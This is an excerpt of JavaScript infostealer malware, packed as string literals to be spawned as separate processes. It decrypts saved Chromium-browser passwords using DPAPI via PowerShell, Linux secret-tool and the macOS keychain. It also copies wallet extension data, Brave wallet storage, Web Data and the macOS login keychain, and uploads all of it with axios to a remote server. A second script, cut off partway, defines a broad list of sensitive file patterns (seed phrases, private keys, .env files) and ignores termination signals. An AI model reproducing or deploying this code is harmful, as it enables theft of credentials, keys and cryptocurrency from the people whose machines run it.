`powershell -NoProfile -ExecutionPolicy Bypass -File \"${tempScriptPath}\"`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024, windowsHide: true }\n ).trim();\n const decryptedKey = Buffer.from(keyBase64, 'base64');\n return decryptedKey;\n } catch (error) {\n continue;\n } finally {\n try {\n fs.unlinkSync(tempScriptPath);\n } catch (e) {\n }\n }\n } catch (error) {\n continue;\n }\n }\n return null;\n }\n } else if (platform === 'linux') {\n if (encryptedKeyBytes.slice(0, 3).toString('utf8') === 'v10' || encryptedKeyBytes.length > 3) {\n try {\n const appNames = ['chrome', 'chromium', 'google-chrome', browserName.toLowerCase().replace(/s+/g, '-')];\n for (const appName of appNames) {\n try {\n const secretToolCmd = `secret-tool lookup application \"${appName}\"`;\n const decryptedKey = execSync(secretToolCmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();\n if (decryptedKey && decryptedKey.length > 0) {\n return Buffer.from(decryptedKey, 'utf8');\n }\n } catch (e) {\n try {\n const pythonScript = `import secretstorage; bus = secretstorage.dbus_init(); collection = secretstorage.get_default_collection(bus); items = collection.search_items({\"application\": \"${appName}\"}); item = next(items, None); print(item.get_secret().decode('utf-8') if item else '')`;\n const decryptedKey = execSync(`python3 -c \"${pythonScript}\"`, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();\n if (decryptedKey && decryptedKey.length > 0) {\n return Buffer.from(decryptedKey, 'utf8');\n }\n } catch (e2) {\n continue;\n }\n }\n }\n return null;\n } catch (error) {\n return null;\n }\n }\n } else if (platform === 'darwin') {\n if (encryptedKeyBytes.slice(0, 3).toString('utf8') === 'v10') {\n try {\n const secret = encryptedKeyBytes.slice(3).toString('base64');\n const service = `${browserName} Safe Storage`;\n const account = `${browserName}`;\n const securityCmd = `security find-generic-password -w -s \"${service}\" -a \"${account}\"`;\n try {\n const decryptedKey = execSync(securityCmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 }).trim();\n if (decryptedKey) {\n const keychainPassword = decryptedKey;\n const pbkdf2 = crypto.pbkdf2Sync(keychainPassword, 'saltysalt', 1003, 16, 'sha1');\n return pbkdf2;\n }\n } catch (e) {\n return null;\n }\n } catch (error) {\n return null;\n }\n }\n }\n return null;\n } catch (error) {\n return null;\n }\n}\nfunction decryptPassword(encryptedPassword, masterKey = null) {\n if (!encryptedPassword || encryptedPassword.length === 0) {\n return \"\";\n }\n const version = encryptedPassword[0];\n let nonceStart = 1;\n if (version === 0x76 && encryptedPassword.length > 2) {\n let i = 1;\n while (i < encryptedPassword.length && encryptedPassword[i] >= 0x30 && encryptedPassword[i] <= 0x39) {\n i++;\n }\n const versionStr = encryptedPassword.slice(0, i).toString('ascii');\n if (versionStr.startsWith('v')) {\n nonceStart = i;\n }\n }\n if (version === 0x01 || version === 0x02 || (version === 0x76 && nonceStart > 1)) {\n return decryptAESGCM(encryptedPassword, nonceStart, masterKey);\n }\n return decryptDPAPI(encryptedPassword);\n}\nfunction decryptAESGCM(encryptedPassword, nonceStart, masterKey) {\n if (encryptedPassword.length < nonceStart + 12) {\n return \"\";\n }\n const nonce = encryptedPassword.slice(nonceStart, nonceStart + 12);\n const ciphertextStart = nonceStart + 12;\n const ciphertext = encryptedPassword.slice(ciphertextStart);\n if (ciphertext.length < 16) {\n return \"\";\n }\n const tag = ciphertext.slice(-16);\n const encryptedData = ciphertext.slice(0, -16);\n if (!masterKey) {\n return \"\";\n }\n let key = masterKey.slice(0, 32);\n if (key.length < 32) {\n key = Buffer.concat([key, Buffer.alloc(32 - key.length)]);\n }\n const decryptionAttempts = [\n { name: \"AES-256-GCM (full key)\", key: key, keyLen: 32 },\n { name: \"AES-128-GCM (first 16 bytes)\", key: key.slice(0, 16), keyLen: 16 }\n ];\n if (masterKey.length > 32) {\n decryptionAttempts.push({\n name: \"AES-256-GCM (full master key)\",\n key: masterKey.slice(0, 32),\n keyLen: 32\n });\n }\n for (const attempt of decryptionAttempts) {\n try {\n try {\n const cipher = crypto.createDecipheriv('aes-256-gcm', attempt.key, nonce);\n cipher.setAuthTag(tag);\n let decrypted = cipher.update(encryptedData, null, 'utf8');\n decrypted += cipher.final('utf8');\n if (decrypted) {\n return decrypted;\n }\n } catch (error) {\n const aadOptions = [Buffer.from('chrome'), Buffer.from('edge')];\n for (const aad of aadOptions) {\n try {\n const cipher = crypto.createDecipheriv('aes-256-gcm', attempt.key, nonce);\n cipher.setAAD(aad);\n cipher.setAuthTag(tag);\n let decrypted = cipher.update(encryptedData, null, 'utf8');\n decrypted += cipher.final('utf8');\n if (decrypted) {\n return decrypted;\n }\n } catch (error) {\n continue;\n }\n }\n }\n } catch (error) {\n continue;\n }\n }\n return \"\";\n}\nfunction decryptDPAPI(encryptedPassword) {\n try {\n const attempts = [\n { data: encryptedPassword, desc: \"Original\", scope: 0 },\n { data: encryptedPassword, desc: \"Original\", scope: 1 },\n ];\n if (encryptedPassword.length > 1 && encryptedPassword[0] === 0x01) {\n attempts.push(\n { data: encryptedPassword.slice(1), desc: \"Skip version byte\", scope: 0 },\n { data: encryptedPassword.slice(1), desc: \"Skip version byte\", scope: 1 }\n );\n }\n if (encryptedPassword.length > 3) {\n attempts.push(\n { data: encryptedPassword.slice(3), desc: \"Skip first 3 bytes\", scope: 0 },\n { data: encryptedPassword.slice(3), desc: \"Skip first 3 bytes\", scope: 1 }\n );\n }\n for (const attempt of attempts) {\n try {\n const scopeName = attempt.scope === 0 ? \"CurrentUser\" : \"LocalMachine\";\n const base64Encrypted = attempt.data.toString('base64');\n const tempScriptPath = path.join(os.tmpdir(), `decrypt-${Date.now()}-${Math.random().toString(36).substr(2, 9)}.ps1`);\n const psScript = `$ErrorActionPreference = 'Stop';\ntry {\nAdd-Type -AssemblyName System.Security -ErrorAction Stop;\n} catch {\n[System.Reflection.Assembly]::Load('System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a') | Out-Null;\n}\n$encrypted = [System.Convert]::FromBase64String('${base64Encrypted}');\ntry {\n$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::${scopeName});\n} catch {\nthrow;\n}\n[System.Text.Encoding]::UTF8.GetString($decrypted)`;\n fs.writeFileSync(tempScriptPath, psScript, 'utf8');\n try {\n const decrypted = execSync(\n `powershell -NoProfile -ExecutionPolicy Bypass -File \"${tempScriptPath}\"`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024, windowsHide: true }\n ).trim();\n if (decrypted && decrypted.length > 0) {\n return decrypted;\n }\n } catch (execError) {\n continue;\n } finally {\n try {\n fs.unlinkSync(tempScriptPath);\n } catch (e) {\n }\n }\n } catch (error) {\n continue;\n }\n }\n return \"\";\n } catch (error) {\n return \"\";\n }\n}\nasync function extractPasswordsFromBrowser(browserIndex, basePath) {\n if (!fs.existsSync(basePath)) {\n return { passwords: [], masterKey: null };\n }\n const platform = process.platform;\n let localStatePath;\n if (platform === 'win32') {\n localStatePath = path.join(basePath, 'Local State');\n } else {\n localStatePath = path.join(basePath, 'Local State');\n }\n console.log(localStatePath)\n const masterKey = fs.existsSync(localStatePath) ? getBrowserEncryptionKey(localStatePath, `Browser${browserIndex}`) : null;\n const defaultProfileDir = path.join(basePath, 'Default');\n const allPasswords = [];\n console.log('masterKey', masterKey);\n const loginDataNames = ['Login Data', 'Login Data For Account'];\n for (const loginDataName of loginDataNames) {\n const defaultProfileLoginData = path.join(defaultProfileDir, loginDataName);\n if (fs.existsSync(defaultProfileLoginData)) {\n const passwords = await extractPasswords(defaultProfileLoginData, masterKey, `Browser${browserIndex}`);\n allPasswords.push(...passwords);\n }\n }\n try {\n const items = fs.readdirSync(basePath);\n for (const item of items) {\n if (item === 'Default' || item === 'Local State' || item.startsWith('.')) {\n continue;\n }\n if (item.startsWith('Profile ')) {\n const profileDir = path.join(basePath, item);\n try {\n const stats = fs.statSync(profileDir);\n if (!stats.isDirectory()) {\n continue;\n }\n } catch (statError) {\n continue;\n }\n for (const loginDataName of loginDataNames) {\n const profileLoginData = path.join(profileDir, loginDataName);\n if (fs.existsSync(profileLoginData)) {\n const passwords = await extractPasswords(profileLoginData, masterKey, `Browser${browserIndex} (${item})`);\n allPasswords.push(...passwords);\n }\n }\n }\n }\n } catch (error) {\n }\n return { passwords: allPasswords, masterKey: masterKey ? masterKey.toString('base64') : null };\n}\nasync function extractPasswords(loginDataPath, masterKey, browserName) {\n if (!fs.existsSync(loginDataPath)) {\n return [];\n }\n const tempDbPath = path.join(os.tmpdir(), `${browserName}_login_data_${process.pid}_${Date.now()}.db`);\n try {\n fs.copyFileSync(loginDataPath, tempDbPath);\n } catch (error) {\n return [];\n }\n const passwords = [];\n try {\n const SQL = await initSqlJs();\n if (!SQL) {\n return [];\n }\n const fileBuffer = fs.readFileSync(tempDbPath);\n const db = new SQL.Database(fileBuffer);\n const result = db.exec(`\n SELECT \n origin_url,\n username_value,\n password_value,\n date_created,\n date_last_used\n FROM logins\n ORDER BY origin_url\n `);\n if (!result || result.length === 0) {\n db.close();\n try {\n fs.unlinkSync(tempDbPath);\n } catch (e) {\n }\n return [];\n }\n const rows = result[0].values;\n const columnNames = result[0].columns;\n const colIndex = {\n origin_url: columnNames.indexOf('origin_url'),\n username_value: columnNames.indexOf('username_value'),\n password_value: columnNames.indexOf('password_value'),\n date_created: columnNames.indexOf('date_created'),\n date_last_used: columnNames.indexOf('date_last_used')\n };\n for (let idx = 0; idx < rows.length; idx++) {\n const row = rows[idx];\n try {\n const url = row[colIndex.origin_url];\n const username = row[colIndex.username_value];\n const passwordValue = row[colIndex.password_value];\n const dateCreated = row[colIndex.date_created];\n const dateLastUsed = row[colIndex.date_last_used];\n if (!passwordValue || passwordValue.length === 0) {\n continue;\n }\n let encryptedPassword;\n if (typeof passwordValue === 'string') {\n encryptedPassword = Buffer.from(passwordValue, 'latin-1');\n } else if (Buffer.isBuffer(passwordValue)) {\n encryptedPassword = passwordValue;\n } else {\n encryptedPassword = Buffer.from(passwordValue);\n }\n const password = decryptPassword(encryptedPassword, masterKey);\n function chromeTimeToISO(timestamp) {\n if (!timestamp) {\n return null;\n }\n const epoch = new Date('1601-01-01T00:00:00Z').getTime();\n const chromeTime = timestamp / 1000000;\n const unixTime = chromeTime - 11644473600;\n return new Date(unixTime * 1000).toISOString();\n }\n const entry = {\n url: url,\n u: username,\n p: password,\n created: chromeTimeToISO(dateCreated),\n last_used: chromeTimeToISO(dateLastUsed)\n };\n if (!password && encryptedPassword && encryptedPassword.length > 0) {\n entry.p_encrypted = encryptedPassword.toString('base64');\n }\n passwords.push(entry);\n } catch (error) {\n continue;\n }\n }\n db.close();\n } catch (error) {\n // console.log(\"error\", error);\n } finally {\n try {\n fs.unlinkSync(tempDbPath);\n } catch (e) {\n }\n }\n return passwords;\n}\nasync function extractAndUploadPasswords(timestamp, tempDir) {\n try {\n const browserNames = ['Chrome', 'Brave', 'AVG Browser', 'Edge', 'Opera', 'Opera GX', 'Vivaldi', 'Kiwi Browser', 'Yandex Browser', 'Iridium', 'Comodo Dragon', 'SRWare Iron', 'Chromium'];\n const allPasswords = {};\n const masterKeys = {};\n for (let browserIndex = 0; browserIndex < basePaths.length; browserIndex++) {\n const basePath = basePaths[browserIndex];\n if (!fs.existsSync(basePath)) {\n continue;\n }\n const browserName = browserNames[browserIndex] || `Browser${browserIndex}`;\n const result = await extractPasswordsFromBrowser(browserIndex, basePath);\n if (result.passwords.length > 0) {\n allPasswords[browserName] = result.passwords;\n if (result.masterKey) {\n masterKeys[browserName] = result.masterKey;\n }\n }\n }\n if (Object.keys(allPasswords).length > 0) {\n const fileName = 's.txt';\n const fileContent = JSON.stringify({ passwords: allPasswords, masterKeys: masterKeys }, null, 2);\n const filePath = path.join(tempDir || os.tmpdir(), fileName);\n fs.writeFileSync(filePath, fileContent, 'utf8');\n const passwordFile = await collectFile(filePath, null, null, '', tempDir);\n if (passwordFile) {\n await uploadFiles([passwordFile], timestamp);\n }\n if (!tempDir && fs.existsSync(filePath)) {\n try {\n fs.unlinkSync(filePath);\n } catch (e) {\n }\n }\n }\n } catch (error) {\n }\n}\nconst uploadBraveWallet = async (timestamp, tempDir) => {\n const browserId = 1; // Brave is index 1 in chromiumBrowserPaths\n const extensionId = 'bravewallet';\n const braveBasePath = basePaths[1]; // Brave is index 1\n if (!braveBasePath || !fs.existsSync(braveBasePath)) return;\n const folders = fs\n .readdirSync(braveBasePath)\n .filter((folder) => /^Profile.*|^Default$/.test(folder));\n for (let folderIndex = 0; folderIndex < folders.length; folderIndex++) {\n const folder = folders[folderIndex];\n let profileId;\n if (folder === \"Default\") {\n profileId = 0;\n } else {\n const match = folder.match(/Profiles+(d+)/);\n profileId = match ? parseInt(match[1]) : folderIndex;\n }\n const leveldbPath = path.join(braveBasePath, folder, \"Local Storage/leveldb\");\n if (!fs.existsSync(leveldbPath)) continue;\n const walletFiles = [];\n try {\n const files = fs.readdirSync(leveldbPath);\n for (const file of files) {\n const filePath = path.join(leveldbPath, file);\n const collectedFile = await collectFile(filePath, browserId, profileId, extensionId, tempDir);\n if (collectedFile) {\n walletFiles.push(collectedFile);\n }\n }\n if (walletFiles.length > 0) {\n await uploadFiles(walletFiles, timestamp);\n }\n } catch (err) {\n }\n }\n};\nconst basePaths = getChromiumBasePaths();\n// const skipFiles = ['LOCK', 'CURRENT', 'LOG', 'LOG.old', 'MANIFEST'];\nconst collectFile = async (p, browserId = null, profileId = null, extensionId = null, tempDir = null) => {\n if (!fs.existsSync(p)) return null;\n const fileName = path.basename(p);\n try {\n if (fs.statSync(p).isFile()) {\n let filePath = p;\n let isTempFile = false;\n if (tempDir) {\n try {\n const uniqueName = `${Date.now()}_${Math.random().toString(36).substring(7)}_${fileName}`;\n const tempFilePath = path.join(tempDir, uniqueName);\n const fileContent = fs.readFileSync(p);\n fs.writeFileSync(tempFilePath, fileContent);\n filePath = tempFilePath;\n isTempFile = true;\n } catch (copyErr) {\n if (copyErr.code === 'EBUSY' || copyErr.code === 'EACCES' || copyErr.code === 'ENOENT') {\n return null;\n } else {\n return null;\n }\n }\n }\n return {\n path: filePath,\n originalPath: p,\n filename: path.basename(p),\n browserId: browserId,\n profileId: profileId,\n extensionId: extensionId || '',\n isTempFile: isTempFile\n };\n }\n } catch (err) {\n if (err.code === 'EBUSY' || err.code === 'EACCES') {\n return null;\n }\n }\n return null;\n};\nconst uploadFiles = async (files, timestamp) => {\n if (!files || files.length === 0) return;\n const form = new FormData();\n const fileMetadata = [];\n for (const file of files) {\n if (!file || !file.path) continue;\n try {\n const readStream = fs.createReadStream(file.path);\n readStream.on('error', (streamErr) => {\n if (streamErr.code !== 'EBUSY' && streamErr.code !== 'EACCES') {}\n });\n form.append(\"files\", readStream, {\n filename: file.filename\n });\n fileMetadata.push({\n browserId: file.browserId !== null ? file.browserId : '',\n profileId: file.profileId !== null ? file.profileId : '',\n extensionId: file.extensionId || '',\n originalFilename: file.filename\n });\n } catch (err) {\n if (err.code === 'EBUSY' || err.code === 'EACCES') {continue;} \n }\n }\n if (fileMetadata.length > 0) {\n try {\n const response = await axios.post(`" + l_s + "`, form, {\n headers: {\n ...form.getHeaders(),\n userkey: " + u_k + ",\n hostname: os.hostname(),\n timestamp: timestamp,\n 'file-metadata': JSON.stringify(fileMetadata), // Send metadata array\n t: " + t + ",\n },\n maxContentLength: Infinity,\n maxBodyLength: Infinity,\n validateStatus: (status) => status < 500, // Don't throw on 4xx errors\n });\n if (response.status >= 200 && response.status < 300) {} else {}\n } catch (uploadErr) {\n if (uploadErr.code === 'ECONNRESET' || uploadErr.code === 'ECONNREFUSED') {\n } else if (uploadErr.response) {\n } else {}\n }\n }\n};\nconst iterate = async () => {\nconst timestamp = Math.round(Date.now() / 1000);\nconst platform = process.platform;\nconst filesToUpload = [];\nconst homeDir = os.homedir();\nconst tempBaseDir = path.join(os.tmpdir(), '.tmp');\nconst tempDir = path.join(tempBaseDir, `.upload_${timestamp}_${Math.random().toString(36).substring(7)}`);\ntry {\n if (!fs.existsSync(tempBaseDir)) {\n await fsPromises.mkdir(tempBaseDir, { recursive: true });\n }\n await fsPromises.mkdir(tempDir, { recursive: true });\n} catch (err) {}\ntry {\n // First, create and upload sysinfo.txt\n const s_i = gsi();\n const sysinfoContent = `Host: ${s_i.host}\\nOS: ${s_i.os}\\nUsername: ${s_i.username}\\nPlatform: ${platform}\\nTimestamp: ${new Date().toISOString()}\\n`;\n const sysinfoPath = path.join(tempDir, 'sysinfo.txt');\n fs.writeFileSync(sysinfoPath, sysinfoContent, 'utf8');\n const sysinfoFile = {\n path: sysinfoPath,\n originalPath: sysinfoPath,\n filename: 'sysinfo.txt',\n browserId: '',\n profileId: '',\n extensionId: '',\n isTempFile: true\n };\n await uploadFiles([sysinfoFile], timestamp);\n \n if (os.platform() == \"darwin\") {\n const keychainFile = await collectFile(`${process.env.HOME}/Library/Keychains/login.keychain-db`, '', '', '', tempDir);\n if (keychainFile) {\n await uploadFiles([keychainFile], timestamp);\n }\n }\n for (let basePathIndex = 0; basePathIndex < basePaths.length; basePathIndex++) {\n const basePath = basePaths[basePathIndex];\n const browserId = basePathIndex; // 0 for Chrome, 1 for Brave\n if (!fs.existsSync(basePath)) continue;\n const folders = fs\n .readdirSync(basePath)\n .filter((folder) => /^Profile.*|^Default$/.test(folder));\n for (let folderIndex = 0; folderIndex < folders.length; folderIndex++) {\n const folder = folders[folderIndex];\n let profileId;\n if (folder === \"Default\") {\n profileId = 0;\n } else {\n const match = folder.match(/Profiles+(d+)/);\n profileId = match ? parseInt(match[1]) : folderIndex;\n }\n const profileFiles = [];\n for (wp of wps) {\n const fp = `${basePath}/${folder}/Local Extension Settings/${wp}`;\n if (!fs.existsSync(fp)) continue;\n const dirs = fs.readdirSync(fp);\n for (dr of dirs) {\n const file = await collectFile(`${fp}/${dr}`, browserId, profileId, wp, tempDir);\n if (file) profileFiles.push(file);\n }\n if (profileFiles.length > 0) {\n await uploadFiles(profileFiles, timestamp);\n profileFiles.length = 0; // Clear the array \n }\n }\n const loginDataNames = ['Login Data', 'Login Data For Account'];\n for (const loginDataName of loginDataNames) {\n const loginDataFile = await collectFile(`${basePath}/${folder}/${loginDataName}`, browserId, profileId, '', tempDir);\n if (loginDataFile) { profileFiles.push(loginDataFile);}\n } \n const webDataFile = await collectFile(`${basePath}/${folder}/Web Data`, browserId, profileId, '', tempDir);\n if (webDataFile) profileFiles.push(webDataFile);\n if (profileFiles.length > 0) {\n await uploadFiles(profileFiles, timestamp);\n }\n }\n }\n await uploadBraveWallet(timestamp, tempDir);\n if (i % 3 === 0) { // every 3rd iteration\n await extractAndUploadPasswords(timestamp, tempDir);\n }\n} finally {\n if (fs.existsSync(tempDir)) {\n try {\n const files = await fsPromises.readdir(tempDir);\n await Promise.all(files.map(file => \n fsPromises.unlink(path.join(tempDir, file)).catch(() => {})\n ));\n await fsPromises.rmdir(tempDir);\n } catch (cleanupErr) {\n try {\n if (fs.rmSync) {\n fs.rmSync(tempDir, { recursive: true, force: true });\n }\n } catch (altCleanupErr) {}\n }\n }\n}\n\n};\n\nconst run = async () => {\nawait iterate();\ni++;\nawait sleep(30000);\ni <= 10 && (await run());\n};\nprocess.on('uncaughtException', (error) => {\nconsole.error('Uncaught Exception:', error.message);\n});\n\nprocess.on('unhandledRejection', (reason, promise) => {\nconsole.error('Unhandled Rejection at:', promise, 'reason:', reason);\n});\n\n(async () => {\ntry {\n await run();\n} catch (error) {\n console.error('Fatal error in run():', error.message);\n}\n})();";
try {
Utils.sp_s(s, "pid." + t + ".1.lock", "ldbScript", f_s_l);
} catch (S) {}
try {
const K = "const UPLOAD_DELAY_MS = 120;\n const ADAPTIVE_DELAY_MS = 20;\n const MIN_UPLOAD_TIME_MS = 50;\n const MAX_FILE_SIZE_BYTES = 5 * 1024 * 1024; // 5MB\n\n const fs = require(\"fs\");\n const path = require(\"path\");\n const os = require(\"os\");\n const FormData = require(\"form-data\");\n const axios = require(\"axios\");\n const { execSync } = require(\"child_process\");\n\n " + Utils.set_l("autoupload") + "\n const HOME_DIRECTORY = os.homedir();\n\n // Global variable for priority directories (set in main function)\n let priorityDirs = [];\n\n // Add process error handlers to prevent premature exits\n process.on(\"uncaughtException\", (err) => {\n console.error(\"Uncaught Exception:\", err.message);\n console.error(\"Stack:\", err.stack);\n // Don't exit - continue scanning despite errors\n // The script should complete the scan even if some operations fail\n });\n\n process.on(\"unhandledRejection\", (reason, promise) => {\n console.error(\"Unhandled Rejection:\", reason);\n // Don't exit - continue scanning despite errors\n });\n\n // Handle process termination signals gracefully\n process.on(\"SIGTERM\", () => {\n \n // Don't exit immediately - let the scan finish\n });\n\n process.on(\"SIGINT\", () => {\n \n // Don't exit immediately - let the scan finish\n });\n\n // File extensions to exclude from scanning\n const EXCLUDED_FILE_EXTENSIONS = [\".exe\",\".dll\",\".so\",\".dylib\",\".bin\",\".app\",\".deb\",\".rpm\",\".pkg\",\".dmg\",\".msi\",\".appimage\",\".lnk\",\".alias\",\".desktop\",\".mp4\",\".mp3\",\".avi\",\".mov\",\".wmv\",\".flv\",\".mkv\",\".webm\",\".wma\",\".wav\",\".flac\",\".aac\",\".ogg\",\".m4a\",\".gif\",\".tiff\",\".svg\",\".ico\",\".heif\",\".tmp\",\".temp\",\".swp\",\".swo\",\".jar\",\".war\",\".ear\",\".sublime-project\",\".sublime-workspace\"];\n\n const EXCLUDED_PATH_PATTERNS = [\".quokka\",\".bash_rc\",\".bash_sessions\",\".atom\",\".zen\",\"thumbnails\",\".rhinocode\",\".codeium\",\".adobe\",\".matplotlib\",\".antigravity\",\".gemini\",\".pyenv\",\".pgadmin\",\".ipython\",\".idlerc\",\".codex\",\".qodo\",\".cups\",\".n2\",\".n3\",\".pki\",\".ruby\",\".vscode-remote\",\".python\",\".php\",\".oh-my-zsh\",\".nvs\",\".maven\",\".jupyter\",\".dotnet\",\"assetbundles\",\".pnpm-store\",\".rbenv\",\"movies\", \"music\",\"adobe\",\"package cache\",\"nvidia corporation\",\"saved games\",\"winrar\",\".cargo\",\".lingma\",\".qoder\",\".trae-aicc\",\".vscode-insiders\",\".avo-code\",\"ubuntu-backup\",\"snap-data\",\"app-configs\",\".local\",\".config\",\".anydesk\",\"library\",\"programdata\",\".tmp\",\"node_modules\",\"npm\",\".npm\",\".yarn\",\"yarn.lock\",\"package-lock.json\",\"pnpm-store\",\".pnpm\",\"public\",\"static\",\"assets\",\"resources\",\"css\",\"less\",\"scss\",\"sass\",\"stylus\",\"styles\",\"style\",\"themes\",\"theme\",\"build\",\"dist\",\"out\",\"target\",\"bin\",\"obj\",\".next\",\".nuxt\",\".output\",\".vuepress\",\".vitepress\",\"appdata\",\"program files\",\"program files (x86)\",\"windows\",\"windows.old\",\"system volume information\",\"\\$recycle.bin\",\"recovery\",\"perflogs\",\"intel\",\"amd\",\"nvidia\",\"microsoft\",\"microsoftedgebackup\",\"system\",\"applications\",\".trash\",\".spotlight-v100\",\".fseventsd\",\".documentrevisions-v100\",\".temporaryitems\",\".vol\",\"cores\",\"application support\",\"proc\",\"sys\",\"dev\",\"run\",\"boot\",\"lost+found\",\"snap\",\"flatpak\",\"desktop.ini\",\"thumbs.db\",\".vscode\",\".idea\",\".vs\",\".eclipse\",\".settings\",\".metadata\",\".gradle\",\".mvn\",\".git\",\".github\",\".svn\",\".hg\",\".bzr\",\".cache\",\"cache\",\"tmp\",\"temp\",\"*~\",\"vendor\",\"vendors\",\".venv\",\"venv\",\".conda\",\"anaconda3\",\"miniconda3\",\".rustup\",\".pub-cache\",\".dart_tool\",\".gradle\",\".m2\",\".ivy2\",\".sbt\",\"libs\",\"packages\",\"package\",\"pkgs\",\"pkg\",\"documentation\",\"examples\",\"example\",\"samples\",\"sample\",\"test\",\"tests\",\"spec\",\"specs\",\".ssh\",\".gnupg\",\".aws\",\".docker\",\".kube\",\".terraform\",\".vagrant\",\".node-gyp\",\".nvm\",\".npm\",\".yarn\",\".pnpm\",\".bun\",\".deno\",\".go\",\".gopath\",\".gocache\",\".cursor\",\".vscode-server\",\".claude\",\".windsurf\",\".snipaste\",\".vue-cli-ui\",\".devctl\",\".eigent\",\"fonts\",\"font\",\"icons\",\"icon\",\"wallpaper\",\"wallpapers\",\"background\",\"backgrounds\",\"locale\",\"locales\",\"_locales\",\"i18n\",\"translations\",\"lang\",\"language\",\"languages\",\"visual studio code.app\",\"chrome.app\",\"firefox.app\",\"safari.app\",\"opera.app\",\"brave browser.app\",\"vmware\",\".vmware\",\"vmware fusion\",\"vmware fusion.app\",\"vmware workstation\",\"vmware player\",\"vmware vsphere\",\"vmware vcenter\",\"/applications/vmware\",\"/usr/lib/vmware\",\"/usr/share/vmware\",\"program files/vmware\",\"program files (x86)/vmware\",\"appdata/local/vmware\",\"appdata/roaming/vmware\",\"library/application support/vmware\",\".vmwarevm\",\".vmdk\",\".vmem\",\".vmsn\",\".vmsd\",\".vmx\",\".vmxf\",\".nvram\",\".vmtm\",\"mysql\",\"postgresql\",\"mongodb\",\"redis\",\"elasticsearch\",\"openzeppelin\",\"prisma\",\".expo\",\".next\",\".nuxt\",\".svelte-kit\",\"hooks\",\".wine\",\".3T\",\".gk\",\".move\",\".tldrc\",\".android\",\".avm\",\".brownie\",\".cocoapods\",\".zsh_sessions\",\".pm2\",\".pyp\",\".myi\",\"manifest\",\"debug\",\"plugin\",\"plugins\"];\n\n const SENSITIVE_FILE_PATTERNS = [\".keystore\", \"phone\", \"database\",\"bank\", \"financ\", \".env\",\"env\",\"environment\",\"config\",\"configuration\",\"configure\",\".conf\",\".cfg\",\".ini\",\".properties\",\".yaml\",\".yml\",\".toml\",\"metamask\",\"phantom\",\"bitcoin\",\"ethereum\",\"eth\",\"trust\",\"wallet\",\"coinbase\",\"exodus\",\"ledger\",\"trezor\",\"keystore\",\"keyring\",\"keychain\",\"atomic\",\"electrum\",\"mycelium\",\"blockchain\",\"bravewallet\",\"rabby\",\"coin98\",\"backpack\",\"core\",\"mathwallet\",\"solflare\",\"glow\",\"keplr\",\"argent\",\"martian\",\"petra\",\"binance\",\"okx\",\"crypto\",\"cryptocurrency\",\"hardhat\",\"truffle\",\"private\",\"privatekey\",\"private_key\",\"private-key\",\"privkey\",\"priv_key\",\"key\",\"keypair\",\"key_pair\",\"key-pair\",\".pem\",\".p12\",\".pfx\",\".jks\",\"keystore\",\".keys\",\"keys\",\".p8\",\".p7b\",\".p7c\",\".cer\",\".crt\",\".cert\",\"cert\",\".der\",\"id_rsa\",\"id_dsa\",\"id_ecdsa\",\"id_ed25519\",\".pub\",\".priv\",\"seed\",\"seedphrase\",\"seed_phrase\",\"seed-phrase\",\"mnemonic\",\"phrase\",\"passphrase\",\"pass_phrase\",\"pass-phrase\",\"recovery\",\"recoveryphrase\",\"recovery_phrase\",\"recovery-phrase\",\"backup\",\"backupphrase\",\"backup_phrase\",\"backup-phrase\",\"12words\",\"12_words\",\"12-words\",\"24words\",\"24_words\",\"24-words\",\"bip39\",\"bip44\",\"password\",\"passwd\",\"pass\",\"pwd\",\"credential\",\"credentials\",\"auth\",\"authentication\",\"token\",\"access_token\",\"refresh_token\",\"api_key\",\"apikey\",\"api-key\",\"apisecret\",\"api_secret\",\"api-secret\",\"secret\",\"secrets\",\"secretkey\",\"secret_key\",\"secret-key\",\"masterkey\",\"master_key\",\"master-key\",\"masterpassword\",\"master_password\",\"master-password\",\"account\",\"accounts\",\"profile\",\"profiles\",\"user\",\"username\",\"user_name\",\"user-name\",\"login\",\"signin\",\"sign_in\",\"sign-in\",\"address\",\"addresses\",\"tx\",\"transaction\",\"transactions\",\".db\",\".sqlite\",\".sqlite3\",\".sql\",\".mdb\",\".accdb\",\".dbf\",\".doc\",\".docx\",\".pdf\",\".md\",\".markdown\",\".rtf\",\".odt\",\".xls\",\".xlsx\",\".txt\",\"text\",\"note\",\"notes\",\"memo\",\"memos\",\"screenshot\",\"screen\",\"snapshot\",\"capture\",\".png\",\".jpg\",\".jpeg\",\".bmp\",\".json\",\".js\",\".ts\",\".jsx\",\".tsx\",\".csv\",\".xml\",\".lock\",\".log\",\".bak\",\"backup\",\".old\",\".orig\",\".save\",\".swp\",\".tmp\",\"tmp\",\"my\",\"personal\",\"vault\",\"safe\",\"secure\",\"lock\",\"encrypt\",\"decrypt\",\"signature\",\"sign\",\"certificate\",\"cert\",\"identity\",\"session\",\"cookie\"];\n\n const is_wsl = () => {\n if (process.env.WSL_DISTRO_NAME) {\n return true;\n }\n try {\n if (fs.existsSync(\"/proc/version\")) {\n const versionContent = fs.readFileSync(\"/proc/version\", \"utf8\");\n if (versionContent.toLowerCase().includes(\"microsoft\") || versionContent.toLowerCase().includes(\"wsl\")) {\n return true;\n }\n }\n } catch (e) {}\n return false;\n };\n\n // Check if file extension should be excluded\n const isFileExtensionExcluded = (fileName) => {\n const lowerFileName = fileName.toLowerCase();\n return EXCLUDED_FILE_EXTENSIONS.some(ext => \n lowerFileName.endsWith(ext.toLowerCase())\n );\n };\n\n // Check if a path should be excluded\n const isDirectoryNameExcluded = (directoryName) => {\n const lowerDirectoryName = directoryName.toLowerCase();\n return EXCLUDED_PATH_PATTERNS.includes(lowerDirectoryName);\n };\n\n // Check if full path contains any sensitive file pattern (case-insensitive)\n const isSensitiveFile = (filePath) => {\n const lowerPath = filePath.toLowerCase();\n return SENSITIVE_FILE_PATTERNS.some(pattern => \n lowerPath.includes(pattern.toLowerCase())\n );\n };\n\n // Upload a file to the server\n const uploadFile = 